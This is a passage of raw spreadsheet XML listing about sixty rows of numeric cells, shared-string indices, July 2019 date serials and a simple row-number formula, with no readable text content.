        <f t="shared" si="149"/>
        <v>9581</v>
      </c>
      <c r="B9582">
        <v>4581</v>
      </c>
      <c r="C9582" t="s">
        <v>9973</v>
      </c>
      <c r="D9582" s="1">
        <v>43672</v>
      </c>
      <c r="E9582" t="s">
        <v>18815</v>
      </c>
      <c r="F9582" t="s">
        <v>9975</v>
      </c>
      <c r="G9582" t="s">
        <v>18816</v>
      </c>
    </row>
    <row r="9583" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9583">
        <f t="shared" si="149"/>
        <v>9582</v>
      </c>
      <c r="B9583">
        <v>4582</v>
      </c>
      <c r="C9583" t="s">
        <v>9973</v>
      </c>
      <c r="D9583" s="1">
        <v>43672</v>
      </c>
      <c r="E9583" t="s">
        <v>18817</v>
      </c>
      <c r="F9583" t="s">
        <v>9975</v>
      </c>
      <c r="G9583" t="s">
        <v>18818</v>
      </c>
    </row>
    <row r="9584" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9584">
        <f t="shared" si="149"/>
        <v>9583</v>
      </c>
      <c r="B9584">
        <v>4583</v>
      </c>
      <c r="C9584" t="s">
        <v>9973</v>
      </c>
      <c r="D9584" s="1">
        <v>43668</v>
      </c>
      <c r="E9584" t="s">
        <v>18819</v>
      </c>
      <c r="F9584" t="s">
        <v>9975</v>
      </c>
      <c r="G9584" t="s">
        <v>18820</v>
      </c>
    </row>
    <row r="9585" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9585">
        <f t="shared" si="149"/>
        <v>9584</v>
      </c>
      <c r="B9585">
        <v>4584</v>
      </c>
      <c r="C9585" t="s">
        <v>9973</v>
      </c>
      <c r="D9585" s="1">
        <v>43670</v>
      </c>
      <c r="E9585" t="s">
        <v>18821</v>
      </c>
      <c r="F9585" t="s">
        <v>9975</v>
      </c>
      <c r="G9585" t="s">
        <v>18822</v>
      </c>
    </row>
    <row r="9586" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9586">
        <f t="shared" si="149"/>
        <v>9585</v>
      </c>
      <c r="B9586">
        <v>4585</v>
      </c>
      <c r="C9586" t="s">
        <v>9973</v>
      </c>
      <c r="D9586" s="1">
        <v>43672</v>
      </c>
      <c r="E9586" t="s">
        <v>18823</v>
      </c>
      <c r="F9586" t="s">
        <v>9975</v>
      </c>
      <c r="G9586" t="s">
        <v>18824</v>
      </c>
    </row>
    <row r="9587" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9587">
        <f t="shared" si="149"/>
        <v>9586</v>
      </c>
      <c r="B9587">
        <v>4586</v>
      </c>
      <c r="C9587" t="s">
        <v>9973</v>
      </c>
      <c r="D9587" s="1">
        <v>43670</v>
      </c>
      <c r="E9587" t="s">
        <v>18825</v>
      </c>
      <c r="F9587" t="s">
        <v>9975</v>
      </c>
      <c r="G9587" t="s">
        <v>18826</v>
      </c>
    </row>
    <row r="9588" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9588">
        <f t="shared" si="149"/>
        <v>9587</v>
      </c>
      <c r="B9588">
        <v>4587</v>
      </c>
      <c r="C9588" t="s">
        <v>9973</v>
      </c>
      <c r="D9588" s="1">
        <v>43673</v>
      </c>
      <c r="E9588" t="s">
        <v>18827</v>
      </c>
      <c r="F9588" t="s">
        <v>9975</v>
      </c>
      <c r="G9588" t="s">
        <v>18828</v>
      </c>
    </row>
    <row r="9589" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9589">
        <f t="shared" si="149"/>
        <v>9588</v>
      </c>
      <c r="B9589">
        <v>4588</v>
      </c>
      <c r="C9589" t="s">
        <v>9973</v>
      </c>
      <c r="D9589" s="1">
        <v>43673</v>
      </c>
      <c r="E9589" t="s">
        <v>18829</v>
      </c>
      <c r="F9589" t="s">
        <v>9975</v>
      </c>
      <c r="G9589" t="s">
        <v>18830</v>
      </c>
    </row>
    <row r="9590" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9590">
        <f t="shared" si="149"/>
        <v>9589</v>
      </c>
      <c r="B9590">
        <v>4589</v>
      </c>
      <c r="C9590" t="s">
        <v>9973</v>
      </c>
      <c r="D9590" s="1">
        <v>43672</v>
      </c>
      <c r="E9590" t="s">
        <v>18831</v>
      </c>
      <c r="F9590" t="s">
        <v>9975</v>
      </c>
      <c r="G9590" t="s">
        <v>18832</v>
      </c>
    </row>
    <row r="9591" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9591">
        <f t="shared" si="149"/>
        <v>9590</v>
      </c>
      <c r="B9591">
        <v>4590</v>
      </c>
      <c r="C9591" t="s">
        <v>9973</v>
      </c>
      <c r="D9591" s="1">
        <v>43675</v>
      </c>
      <c r="E9591" t="s">
        <v>18833</v>
      </c>
      <c r="F9591" t="s">
        <v>9975</v>
      </c>
      <c r="G9591" t="s">
        <v>18834</v>
      </c>
    </row>
    <row r="9592" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9592">
        <f t="shared" si="149"/>
        <v>9591</v>
      </c>
      <c r="B9592">
        <v>4591</v>
      </c>
      <c r="C9592" t="s">
        <v>9973</v>
      </c>
      <c r="D9592" s="1">
        <v>43671</v>
      </c>
      <c r="E9592" t="s">
        <v>18835</v>
      </c>
      <c r="F9592" t="s">
        <v>10526</v>
      </c>
      <c r="G9592" t="s">
        <v>18836</v>
      </c>
    </row>
    <row r="9593" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9593">
        <f t="shared" si="149"/>
        <v>9592</v>
      </c>
      <c r="B9593">
        <v>4592</v>
      </c>
      <c r="C9593" t="s">
        <v>9973</v>
      </c>
      <c r="D9593" s="1">
        <v>43676</v>
      </c>
      <c r="E9593" t="s">
        <v>18837</v>
      </c>
      <c r="F9593" t="s">
        <v>9975</v>
      </c>
      <c r="G9593" t="s">
        <v>18838</v>
      </c>
    </row>
    <row r="9594" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9594">
        <f t="shared" si="149"/>
        <v>9593</v>
      </c>
      <c r="B9594">
        <v>4593</v>
      </c>
      <c r="C9594" t="s">
        <v>9973</v>
      </c>
      <c r="D9594" s="1">
        <v>43677</v>
      </c>
      <c r="E9594" t="s">
        <v>18839</v>
      </c>
      <c r="F9594" t="s">
        <v>9975</v>
      </c>
      <c r="G9594" t="s">
        <v>18840</v>
      </c>
    </row>
    <row r="9595" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9595">
        <f t="shared" si="149"/>
        <v>9594</v>
      </c>
      <c r="B9595">
        <v>4594</v>
      </c>
      <c r="C9595" t="s">
        <v>9973</v>
      </c>
      <c r="D9595" s="1">
        <v>43672</v>
      </c>
      <c r="E9595" t="s">
        <v>18841</v>
      </c>
      <c r="F9595" t="s">
        <v>9975</v>
      </c>
      <c r="G9595" t="s">
        <v>18842</v>
      </c>
    </row>
    <row r="9596" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9596">
        <f t="shared" si="149"/>
        <v>9595</v>
      </c>
      <c r="B9596">
        <v>4595</v>
      </c>
      <c r="C9596" t="s">
        <v>9973</v>
      </c>
      <c r="D9596" s="1">
        <v>43669</v>
      </c>
      <c r="E9596" t="s">
        <v>18843</v>
      </c>
      <c r="F9596" t="s">
        <v>9975</v>
      </c>
      <c r="G9596" t="s">
        <v>18844</v>
      </c>
    </row>
    <row r="9597" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9597">
        <f t="shared" si="149"/>
        <v>9596</v>
      </c>
      <c r="B9597">
        <v>4596</v>
      </c>
      <c r="C9597" t="s">
        <v>9973</v>
      </c>
      <c r="D9597" s="1">
        <v>43673</v>
      </c>
      <c r="E9597" t="s">
        <v>18845</v>
      </c>
      <c r="F9597" t="s">
        <v>9975</v>
      </c>
      <c r="G9597" t="s">
        <v>18846</v>
      </c>
    </row>
    <row r="9598" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9598">
        <f t="shared" si="149"/>
        <v>9597</v>
      </c>
      <c r="B9598">
        <v>4597</v>
      </c>
      <c r="C9598" t="s">
        <v>9973</v>
      </c>
      <c r="D9598" s="1">
        <v>43673</v>
      </c>
      <c r="E9598" t="s">
        <v>18847</v>
      </c>
      <c r="F9598" t="s">
        <v>9975</v>
      </c>
      <c r="G9598" t="s">
        <v>18848</v>
      </c>
    </row>
    <row r="9599" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9599">
        <f t="shared" si="149"/>
        <v>9598</v>
      </c>
      <c r="B9599">
        <v>4598</v>
      </c>
      <c r="C9599" t="s">
        <v>9973</v>
      </c>
      <c r="D9599" s="1">
        <v>43672</v>
      </c>
      <c r="E9599" t="s">
        <v>15154</v>
      </c>
      <c r="F9599" t="s">
        <v>9975</v>
      </c>
      <c r="G9599" t="s">
        <v>18849</v>
      </c>
    </row>
    <row r="9600" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9600">
        <f t="shared" si="149"/>
        <v>9599</v>
      </c>
      <c r="B9600">
        <v>4599</v>
      </c>
      <c r="C9600" t="s">
        <v>9973</v>
      </c>
      <c r="D9600" s="1">
        <v>43668</v>
      </c>
      <c r="E9600" t="s">
        <v>18850</v>
      </c>
      <c r="F9600" t="s">
        <v>9975</v>
      </c>
      <c r="G9600" t="s">
        <v>18851</v>
      </c>
    </row>
    <row r="9601" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9601">
        <f t="shared" si="149"/>
        <v>9600</v>
      </c>
      <c r="B9601">
        <v>4600</v>
      </c>
      <c r="C9601" t="s">
        <v>9973</v>
      </c>
      <c r="D9601" s="1">
        <v>43673</v>
      </c>
      <c r="E9601" t="s">
        <v>18852</v>
      </c>
      <c r="F9601" t="s">
        <v>9975</v>
      </c>
      <c r="G9601" t="s">
        <v>18853</v>
      </c>
    </row>
    <row r="9602" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9602">
        <f t="shared" si="149"/>
        <v>9601</v>
      </c>
      <c r="B9602">
        <v>4601</v>
      </c>
      <c r="C9602" t="s">
        <v>9973</v>
      </c>
      <c r="D9602" s="1">
        <v>43670</v>
      </c>
      <c r="E9602" t="s">
        <v>18854</v>
      </c>
      <c r="F9602" t="s">
        <v>9975</v>
      </c>
      <c r="G9602" t="s">
        <v>18855</v>
      </c>
    </row>
    <row r="9603" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9603">
        <f t="shared" ref="A9603:A9666" si="150">+ROW(A9602)</f>
        <v>9602</v>
      </c>
      <c r="B9603">
        <v>4602</v>
      </c>
      <c r="C9603" t="s">
        <v>9973</v>
      </c>
      <c r="D9603" s="1">
        <v>43669</v>
      </c>
      <c r="E9603" t="s">
        <v>18856</v>
      </c>
      <c r="F9603" t="s">
        <v>9975</v>
      </c>
      <c r="G9603" t="s">
        <v>18857</v>
      </c>
    </row>
    <row r="9604" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9604">
        <f t="shared" si="150"/>
        <v>9603</v>
      </c>
      <c r="B9604">
        <v>4603</v>
      </c>
      <c r="C9604" t="s">
        <v>9973</v>
      </c>
      <c r="D9604" s="1">
        <v>43673</v>
      </c>
      <c r="E9604" t="s">
        <v>18858</v>
      </c>
      <c r="F9604" t="s">
        <v>9975</v>
      </c>
      <c r="G9604" t="s">
        <v>18859</v>
      </c>
    </row>
    <row r="9605" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9605">
        <f t="shared" si="150"/>
        <v>9604</v>
      </c>
      <c r="B9605">
        <v>4604</v>
      </c>
      <c r="C9605" t="s">
        <v>9973</v>
      </c>
      <c r="D9605" s="1">
        <v>43669</v>
      </c>
      <c r="E9605" t="s">
        <v>18860</v>
      </c>
      <c r="F9605" t="s">
        <v>9975</v>
      </c>
      <c r="G9605" t="s">
        <v>18861</v>
      </c>
    </row>
    <row r="9606" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9606">
        <f t="shared" si="150"/>
        <v>9605</v>
      </c>
      <c r="B9606">
        <v>4605</v>
      </c>
      <c r="C9606" t="s">
        <v>9973</v>
      </c>
      <c r="D9606" s="1">
        <v>43671</v>
      </c>
      <c r="E9606" t="s">
        <v>18862</v>
      </c>
      <c r="F9606" t="s">
        <v>9975</v>
      </c>
      <c r="G9606" t="s">
        <v>18863</v>
      </c>
    </row>
    <row r="9607" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9607">
        <f t="shared" si="150"/>
        <v>9606</v>
      </c>
      <c r="B9607">
        <v>4606</v>
      </c>
      <c r="C9607" t="s">
        <v>9973</v>
      </c>
      <c r="D9607" s="1">
        <v>43676</v>
      </c>
      <c r="E9607" t="s">
        <v>18864</v>
      </c>
      <c r="F9607" t="s">
        <v>9975</v>
      </c>
      <c r="G9607" t="s">
        <v>18865</v>
      </c>
    </row>
    <row r="9608" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9608">
        <f t="shared" si="150"/>
        <v>9607</v>
      </c>
      <c r="B9608">
        <v>4607</v>
      </c>
      <c r="C9608" t="s">
        <v>9973</v>
      </c>
      <c r="D9608" s="1">
        <v>43671</v>
      </c>
      <c r="E9608" t="s">
        <v>18866</v>
      </c>
      <c r="F9608" t="s">
        <v>9975</v>
      </c>
      <c r="G9608" t="s">
        <v>18867</v>
      </c>
    </row>
    <row r="9609" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9609">
        <f t="shared" si="150"/>
        <v>9608</v>
      </c>
      <c r="B9609">
        <v>4608</v>
      </c>
      <c r="C9609" t="s">
        <v>9973</v>
      </c>
      <c r="D9609" s="1">
        <v>43676</v>
      </c>
      <c r="E9609" t="s">
        <v>18868</v>
      </c>
      <c r="F9609" t="s">
        <v>9975</v>
      </c>
      <c r="G9609" t="s">
        <v>18869</v>
      </c>
    </row>
    <row r="9610" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9610">
        <f t="shared" si="150"/>
        <v>9609</v>
      </c>
      <c r="B9610">
        <v>4609</v>
      </c>
      <c r="C9610" t="s">
        <v>9973</v>
      </c>
      <c r="D9610" s="1">
        <v>43675</v>
      </c>
      <c r="E9610" t="s">
        <v>18870</v>
      </c>
      <c r="F9610" t="s">
        <v>9975</v>
      </c>
      <c r="G9610" t="s">
        <v>18871</v>
      </c>
    </row>
    <row r="9611" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9611">
        <f t="shared" si="150"/>
        <v>9610</v>
      </c>
      <c r="B9611">
        <v>4610</v>
      </c>
      <c r="C9611" t="s">
        <v>9973</v>
      </c>
      <c r="D9611" s="1">
        <v>43674</v>
      </c>
      <c r="E9611" t="s">
        <v>18872</v>
      </c>
      <c r="F9611" t="s">
        <v>9975</v>
      </c>
      <c r="G9611" t="s">
        <v>18873</v>
      </c>
    </row>
    <row r="9612" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9612">
        <f t="shared" si="150"/>
        <v>9611</v>
      </c>
      <c r="B9612">
        <v>4611</v>
      </c>
      <c r="C9612" t="s">
        <v>9973</v>
      </c>
      <c r="D9612" s="1">
        <v>43670</v>
      </c>
      <c r="E9612" t="s">
        <v>18874</v>
      </c>
      <c r="F9612" t="s">
        <v>9975</v>
      </c>
      <c r="G9612" t="s">
        <v>18875</v>
      </c>
    </row>
    <row r="9613" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9613">
        <f t="shared" si="150"/>
        <v>9612</v>
      </c>
      <c r="B9613">
        <v>4612</v>
      </c>
      <c r="C9613" t="s">
        <v>9973</v>
      </c>
      <c r="D9613" s="1">
        <v>43671</v>
      </c>
      <c r="E9613" t="s">
        <v>18876</v>
      </c>
      <c r="F9613" t="s">
        <v>9975</v>
      </c>
      <c r="G9613" t="s">
        <v>18877</v>
      </c>
    </row>
    <row r="9614" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9614">
        <f t="shared" si="150"/>
        <v>9613</v>
      </c>
      <c r="B9614">
        <v>4613</v>
      </c>
      <c r="C9614" t="s">
        <v>9973</v>
      </c>
      <c r="D9614" s="1">
        <v>43674</v>
      </c>
      <c r="E9614" t="s">
        <v>10099</v>
      </c>
      <c r="F9614" t="s">
        <v>9975</v>
      </c>
      <c r="G9614" t="s">
        <v>18878</v>
      </c>
    </row>
    <row r="9615" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9615">
        <f t="shared" si="150"/>
        <v>9614</v>
      </c>
      <c r="B9615">
        <v>4614</v>
      </c>
      <c r="C9615" t="s">
        <v>9973</v>
      </c>
      <c r="D9615" s="1">
        <v>43675</v>
      </c>
      <c r="E9615" t="s">
        <v>18879</v>
      </c>
      <c r="F9615" t="s">
        <v>9975</v>
      </c>
      <c r="G9615" t="s">
        <v>18880</v>
      </c>
    </row>
    <row r="9616" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9616">
        <f t="shared" si="150"/>
        <v>9615</v>
      </c>
      <c r="B9616">
        <v>4615</v>
      </c>
      <c r="C9616" t="s">
        <v>9973</v>
      </c>
      <c r="D9616" s="1">
        <v>43677</v>
      </c>
      <c r="E9616" t="s">
        <v>18881</v>
      </c>
      <c r="F9616" t="s">
        <v>9975</v>
      </c>
      <c r="G9616" t="s">
        <v>18882</v>
      </c>
    </row>
    <row r="9617" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9617">
        <f t="shared" si="150"/>
        <v>9616</v>
      </c>
      <c r="B9617">
        <v>4616</v>
      </c>
      <c r="C9617" t="s">
        <v>9973</v>
      </c>
      <c r="D9617" s="1">
        <v>43672</v>
      </c>
      <c r="E9617" t="s">
        <v>18883</v>
      </c>
      <c r="F9617" t="s">
        <v>9975</v>
      </c>
      <c r="G9617" t="s">
        <v>18884</v>
      </c>
    </row>
    <row r="9618" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9618">
        <f t="shared" si="150"/>
        <v>9617</v>
      </c>
      <c r="B9618">
        <v>4617</v>
      </c>
      <c r="C9618" t="s">
        <v>9973</v>
      </c>
      <c r="D9618" s="1">
        <v>43672</v>
      </c>
      <c r="E9618" t="s">
        <v>18885</v>
      </c>
      <c r="F9618" t="s">
        <v>9975</v>
      </c>
      <c r="G9618" t="s">
        <v>18886</v>
      </c>
    </row>
    <row r="9619" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9619">
        <f t="shared" si="150"/>
        <v>9618</v>
      </c>
      <c r="B9619">
        <v>4618</v>
      </c>
      <c r="C9619" t="s">
        <v>9973</v>
      </c>
      <c r="D9619" s="1">
        <v>43677</v>
      </c>
      <c r="E9619" t="s">
        <v>18887</v>
      </c>
      <c r="F9619" t="s">
        <v>9975</v>
      </c>
      <c r="G9619" t="s">
        <v>18888</v>
      </c>
    </row>
    <row r="9620" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9620">
        <f t="shared" si="150"/>
        <v>9619</v>
      </c>
      <c r="B9620">
        <v>4619</v>
      </c>
      <c r="C9620" t="s">
        <v>9973</v>
      </c>
      <c r="D9620" s="1">
        <v>43676</v>
      </c>
      <c r="E9620" t="s">
        <v>18889</v>
      </c>
      <c r="F9620" t="s">
        <v>9975</v>
      </c>
      <c r="G9620" t="s">
        <v>18890</v>
      </c>
    </row>
    <row r="9621" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9621">
        <f t="shared" si="150"/>
        <v>9620</v>
      </c>
      <c r="B9621">
        <v>4620</v>
      </c>
      <c r="C9621" t="s">
        <v>9973</v>
      </c>
      <c r="D9621" s="1">
        <v>43673</v>
      </c>
      <c r="E9621" t="s">
        <v>18891</v>
      </c>
      <c r="F9621" t="s">
        <v>9975</v>
      </c>
      <c r="G9621" t="s">
        <v>18892</v>
      </c>
    </row>
    <row r="9622" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9622">
        <f t="shared" si="150"/>
        <v>9621</v>
      </c>
      <c r="B9622">
        <v>4621</v>
      </c>
      <c r="C9622" t="s">
        <v>9973</v>
      </c>
      <c r="D9622" s="1">
        <v>43669</v>
      </c>
      <c r="E9622" t="s">
        <v>18893</v>
      </c>
      <c r="F9622" t="s">
        <v>9975</v>
      </c>
      <c r="G9622" t="s">
        <v>18894</v>
      </c>
    </row>
    <row r="9623" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9623">
        <f t="shared" si="150"/>
        <v>9622</v>
      </c>
      <c r="B9623">
        <v>4622</v>
      </c>
      <c r="C9623" t="s">
        <v>9973</v>
      </c>
      <c r="D9623" s="1">
        <v>43676</v>
      </c>
      <c r="E9623" t="s">
        <v>18895</v>
      </c>
      <c r="F9623" t="s">
        <v>9975</v>
      </c>
      <c r="G9623" t="s">
        <v>18896</v>
      </c>
    </row>
    <row r="9624" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9624">
        <f t="shared" si="150"/>
        <v>9623</v>
      </c>
      <c r="B9624">
        <v>4623</v>
      </c>
      <c r="C9624" t="s">
        <v>9973</v>
      </c>
      <c r="D9624" s="1">
        <v>43674</v>
      </c>
      <c r="E9624" t="s">
        <v>18897</v>
      </c>
      <c r="F9624" t="s">
        <v>9975</v>
      </c>
      <c r="G9624" t="s">
        <v>18898</v>
      </c>
    </row>
    <row r="9625" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9625">
        <f t="shared" si="150"/>
        <v>9624</v>
      </c>
      <c r="B9625">
        <v>4624</v>
      </c>
      <c r="C9625" t="s">
        <v>9973</v>
      </c>
      <c r="D9625" s="1">
        <v>43673</v>
      </c>
      <c r="E9625" t="s">
        <v>18899</v>
      </c>
      <c r="F9625" t="s">
        <v>9975</v>
      </c>
      <c r="G9625" t="s">
        <v>18900</v>
      </c>
    </row>
    <row r="9626" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9626">
        <f t="shared" si="150"/>
        <v>9625</v>
      </c>
      <c r="B9626">
        <v>4625</v>
      </c>
      <c r="C9626" t="s">
        <v>9973</v>
      </c>
      <c r="D9626" s="1">
        <v>43675</v>
      </c>
      <c r="E9626" t="s">
        <v>10611</v>
      </c>
      <c r="F9626" t="s">
        <v>9975</v>
      </c>
      <c r="G9626" t="s">
        <v>18901</v>
      </c>
    </row>
    <row r="9627" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9627">
        <f t="shared" si="150"/>
        <v>9626</v>
      </c>
      <c r="B9627">
        <v>4626</v>
      </c>
      <c r="C9627" t="s">
        <v>9973</v>
      </c>
      <c r="D9627" s="1">
        <v>43672</v>
      </c>
      <c r="E9627" t="s">
        <v>18902</v>
      </c>
      <c r="F9627" t="s">
        <v>9975</v>
      </c>
      <c r="G9627" t="s">
        <v>18903</v>
      </c>
    </row>
    <row r="9628" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9628">
        <f t="shared" si="150"/>
        <v>9627</v>
      </c>
      <c r="B9628">
        <v>4627</v>
      </c>
      <c r="C9628" t="s">
        <v>9973</v>
      </c>
      <c r="D9628" s="1">
        <v>43668</v>
      </c>
      <c r="E9628" t="s">
        <v>18904</v>
      </c>
      <c r="F9628" t="s">
        <v>9975</v>
      </c>
      <c r="G9628" t="s">
        <v>18905</v>
      </c>
    </row>
    <row r="9629" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9629">
        <f t="shared" si="150"/>
        <v>9628</v>
      </c>
      <c r="B9629">
        <v>4628</v>
      </c>
      <c r="C9629" t="s">
        <v>9973</v>
      </c>
      <c r="D9629" s="1">
        <v>43674</v>
      </c>
      <c r="E9629" t="s">
        <v>18906</v>
      </c>
      <c r="F9629" t="s">
        <v>9975</v>
      </c>
      <c r="G9629" t="s">
        <v>18907</v>
      </c>
    </row>
    <row r="9630" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9630">
        <f t="shared" si="150"/>
        <v>9629</v>
      </c>
      <c r="B9630">
        <v>4629</v>
      </c>
      <c r="C9630" t="s">
        <v>9973</v>
      </c>
      <c r="D9630" s="1">
        <v>43673</v>
      </c>
      <c r="E9630" t="s">
        <v>18908</v>
      </c>
      <c r="F9630" t="s">
        <v>9975</v>
      </c>
      <c r="G9630" t="s">
        <v>18909</v>
      </c>
    </row>
    <row r="9631" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9631">
        <f t="shared" si="150"/>
        <v>9630</v>
      </c>
      <c r="B9631">
        <v>4630</v>
      </c>
      <c r="C9631" t="s">
        <v>9973</v>
      </c>
      <c r="D9631" s="1">
        <v>43672</v>
      </c>
      <c r="E9631" t="s">
        <v>18910</v>
      </c>
      <c r="F9631" t="s">
        <v>9975</v>
      </c>
      <c r="G9631" t="s">
        <v>18911</v>
      </c>
    </row>
    <row r="9632" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9632">
        <f t="shared" si="150"/>
        <v>9631</v>
      </c>
      <c r="B9632">
        <v>4631</v>
      </c>
      <c r="C9632" t="s">
        <v>9973</v>
      </c>
      <c r="D9632" s="1">
        <v>43676</v>
      </c>
      <c r="E9632" t="s">
        <v>18912</v>
      </c>
      <c r="F9632" t="s">
        <v>9975</v>
      </c>
      <c r="G9632" t="s">
        <v>18913</v>
      </c>
    </row>
    <row r="9633" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9633">
        <f t="shared" si="150"/>
        <v>9632</v>
      </c>
      <c r="B9633">
        <v>4632</v>
      </c>
      <c r="C9633" t="s">
        <v>9973</v>
      </c>
      <c r="D9633" s="1">
        <v>43670</v>
      </c>
      <c r="E9633" t="s">
        <v>18914</v>
      </c>
      <c r="F9633" t="s">
        <v>9975</v>
      </c>
      <c r="G9633" t="s">
        <v>18915</v>
      </c>
    </row>
    <row r="9634" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9634">
        <f t="shared" si="150"/>
        <v>9633</v>
      </c>
      <c r="B9634">
        <v>4633</v>
      </c>
      <c r="C9634" t="s">
        <v>9973</v>
      </c>
      <c r="D9634" s="1">
        <v>43671</v>
      </c>
      <c r="E9634" t="s">
        <v>18916</v>
      </c>
      <c r="F9634" t="s">
        <v>9975</v>
      </c>
      <c r="G9634" t="s">
        <v>18917</v>
      </c>
    </row>
    <row r="9635" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9635">
        <f t="shared" si="150"/>
        <v>9634</v>
      </c>
      <c r="B9635">
        <v>4634</v>
      </c>
      <c r="C9635" t="s">
        <v>9973</v>
      </c>
      <c r="D9635" s="1">
        <v>43676</v>
      </c>
      <c r="E9635" t="s">
        <v>18918</v>
      </c>
      <c r="F9635" t="s">
        <v>9975</v>
      </c>
      <c r="G9635" t="s">
        <v>18919</v>
      </c>
    </row>
    <row r="9636" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9636">
        <f t="shared" si="150"/>
        <v>9635</v>
      </c>
      <c r="B9636">
        <v>4635</v>
      </c>
      <c r="C9636" t="s">
        <v>9973</v>
      </c>
      <c r="D9636" s="1">
        <v>43668</v>
      </c>
      <c r="E9636" t="s">
        <v>18920</v>
      </c>
      <c r="F9636" t="s">
        <v>9975</v>
      </c>
      <c r="G9636" t="s">
        <v>18921</v>
      </c>
    </row>
    <row r="9637" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9637">
        <f t="shared" si="150"/>
        <v>9636</v>
      </c>
      <c r="B9637">
        <v>4636</v>
      </c>
      <c r="C9637" t="s">
        <v>9973</v>
      </c>
      <c r="D9637" s="1">
        <v>43668</v>
      </c>
      <c r="E9637" t="s">
        <v>18922</v>
      </c>
      <c r="F9637" t="s">
        <v>9975</v>
      </c>
      <c r="G9637" t="s">
        <v>18923</v>
      </c>
    </row>
    <row r="9638" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9638">
        <f t="shared" si="150"/>
        <v>9637</v>
      </c>
      <c r="B9638">
        <v>4637</v>
      </c>
      <c r="C9638" t="s">
        <v>9973</v>
      </c>
      <c r="D9638" s="1">
        <v>43670</v>
      </c>
      <c r="E9638" t="s">
        <v>18924</v>
      </c>
      <c r="F9638" t="s">
        <v>9975</v>
      </c>
      <c r="G9638" t="s">
        <v>18925</v>
      </c>
    </row>
    <row r="9639" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9639">
        <f t="shared" si="150"/>
        <v>9638</v>
      </c>
      <c r="B9639">
        <v>4638</v>
      </c>
      <c r="C9639" t="s">
        <v>9973</v>
      </c>
      <c r="D9639" s="1">
        <v>43669</v>
      </c>
      <c r="E9639" t="s">
        <v>18926</v>
      </c>
      <c r="F9639" t="s">
        <v>9975</v>
      </c>
      <c r="G9639" t="s">
        <v>18927</v>
      </c>
    </row>
    <row r="9640" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9640">
        <f t="shared" si="150"/>
        <v>9639</v>
      </c>
      <c r="B9640">
        <v>4639</v>
      </c>
      <c r="C9640" t="s">
        <v>9973</v>
      </c>
      <c r="D9640" s="1">
        <v>43671</v>
      </c>
      <c r="E9640" t="s">
        <v>18928</v>
      </c>
      <c r="F9640" t="s">
        <v>9975</v>
      </c>
      <c r="G9640" t="s">
        <v>18929</v>
      </c>
    </row>
    <row r="9641" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9641">
        <f t="shared" si="150"/>
        <v>9640</v>
      </c>
      <c r="B9641">
        <v>4640</v>
      </c>
      <c r="C9641" t="s">
        <v>9973</v>
      </c>
      <c r="D9641" s="1">
        <v>43676</v>
      </c>
      <c r="E9641" t="s">
        <v>18930</v>
      </c>
      <c r="F9641" t="s">
        <v>9975</v>
      </c>
      <c r="G9641" t="s">
        <v>18931</v>
      </c>
    </row>
    <row r="9642" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9642">
        <f t="shared" si="150"/>
        <v>9641</v>
      </c>
      <c r="B9642">
        <v>4641</v>
      </c>
      <c r="C9642" t="s">
        <v>9973</v>
      </c>
      <c r="D9642" s="1">
        <v>43676</v>
      </c>
      <c r="E9642" t="s">
        <v>18932</v>
      </c>
      <c r="F9642" t="s">
        <v>9975</v>
      </c>
      <c r="G9642" t="s">
        <v>18933</v>
      </c>
    </row>
